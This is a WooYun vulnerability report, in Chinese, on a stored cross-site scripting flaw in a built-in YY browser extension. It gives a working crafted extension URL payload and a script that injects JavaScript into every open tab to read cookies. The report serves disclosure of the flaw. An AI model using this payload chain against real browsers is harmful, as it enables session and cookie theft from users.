WooYun.org

YY浏览器号称双核极速，去广告安全。但是结合一些细节小问题可以导致任意域xss。
0x01：
在对yy浏览器进行常规的安全测试的过程中，发现有一个内置插件（该插件是官网安装之后默认安装的）

也就是这个：

在影视搜索的地方，我发现历史记录会带入到local storage中：

0x02：
下一次搜索的时候，点击搜索框，就会触发这个跨站漏洞：

经过测试，发现<script>alert()</script>这种形式能成功执行任意脚本，而img不行，会提示un-safe 不安全的脚本，没关系，我们就用<script>alert()</script> 来执行恶意脚本。
0x03：
利用location.href来确定地址：

这个是点开的地址，真正触发的地址是这个：

也就是说我们构造如下地址：chrome-extension://ffbeebainnmlcloegidjjepclkamjgol/search.html?key=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
然后让受害者点击一下视频搜索，我们的document.domain就会污染到本地的local storage
0x04：
我们已经可以控制任意js写入到local storage里头，但是测试发现不能引入外部js，同样会提示un-safe脚本，只能写入到<script></script>之中，这也算是你们安全考虑不周导致的。
0x05：
因为发生xss的作用域在扩展域，也就有了更高的权限：（chrome-extension://ffbeebainnmlcloegidjjepclkamjgol）
譬如允许通过
chrome.tabs.getAllInWindow(id,function(){console.log(arguments)}) 来读取任意窗口的id。结合这些id。
通过chrome.tabs.executeScript(id,{"code":"alert(document.cookie)"},function(){console.log(arguments)})允许往任意窗口写入js脚本。
代码如下：

chrome.tabs.getAllInWindow(null,function(){
for(var i=0;i<=arguments[0].length-1;i++){
console.log(arguments[0][i].id)
chrome.tabs.executeScript(arguments[0][i].id,{"code":"alert(document.cookie)"},function(){console.log(res)})
}
}
)

剑心mm提到一个问题，插件是否随机的，我在虚拟机测试，也是这个路径，证明这个路径是可以预测的：如下图